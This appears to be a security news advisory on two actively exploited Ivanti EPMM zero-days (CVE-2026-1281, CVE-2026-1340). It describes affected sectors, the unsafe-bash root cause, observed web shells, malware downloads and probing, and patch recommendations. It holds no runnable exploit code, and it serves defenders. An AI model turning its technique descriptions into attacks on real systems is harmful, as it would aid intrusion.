Critical Ivanti EPMM Zero-Day Vulnerabilities Exploited in Corporate Networks
In early 2026, two critical zero-day vulnerabilities were discovered in Ivanti Endpoint Manager Mobile (EPMM), posing significant threats to enterprise networks worldwide. Identified as CVE-2026-1281 and CVE-2026-1340, these flaws enable unauthenticated attackers to execute arbitrary code remotely on target servers without requiring user interaction or credentials.
Global Impact and Affected Sectors
The exploitation of these vulnerabilities has been widespread, affecting organizations across the United States, Germany, Australia, and Canada. Sectors particularly impacted include state and local governments, healthcare, manufacturing, professional services, and high technology. Attackers have leveraged these flaws to gain complete control over mobile device management infrastructures, allowing them to establish reverse shells, install web shells, conduct reconnaissance, and deploy malicious software.
Technical Details of the Vulnerabilities
Both vulnerabilities stem from unsafe bash script usage in legacy components responsible for URL rewriting within the Apache web server configuration.
– CVE-2026-1281: This vulnerability affects scripts used for the In-House Application Distribution feature.
– CVE-2026-1340: This flaw impacts the Android File Transfer mechanism.
Exploitation of these vulnerabilities allows attackers to execute arbitrary commands on the appliance, access sensitive information stored in EPMM, and potentially move laterally to connected systems and services.
Attack Methods and Malicious Activity
Security researchers have observed various malicious activities associated with these vulnerabilities:
– Deployment of Web Shells: Attackers have installed lightweight JSP web shells with names like 401.jsp, 403.jsp, and 1.jsp in the server’s web application directory. These shells grant administrative control if the web server runs with elevated privileges.
– Malware Installation: Threat actors have attempted to download the Nezha monitoring agent, an open-source server utility, with specific parameters targeting victims in China by fetching from Gitee repositories. Some campaigns involved downloading second-stage payloads that install cryptominers or persistent backdoors on compromised appliances.
– Reconnaissance Techniques: Attackers have used sleep commands as a method to determine server vulnerability, indicating a strategic approach to identifying and exploiting susceptible systems.
Mitigation and Recommendations
Ivanti has released version-specific patches (RPM 12.x.0.x or RPM 12.x.1.x) that require no downtime and take only seconds to apply. Organizations are strongly advised to:
1. Apply Patches Immediately: Ensure that all vulnerable systems are updated with the latest patches to mitigate the risk of exploitation.
2. Review Systems for Signs of Exploitation: Conduct thorough audits of appliances to detect any indicators of compromise that may have occurred before patching.
3. Implement Additional Security Measures: Consider deploying intrusion prevention systems, monitoring network traffic for unusual activity, and educating staff about potential phishing attempts that may exploit these vulnerabilities.
Conclusion
The discovery and active exploitation of CVE-2026-1281 and CVE-2026-1340 underscore the critical importance of timely vulnerability management and proactive security measures. Organizations must remain vigilant, apply necessary patches promptly, and continuously monitor their systems to defend against evolving cyber threats.
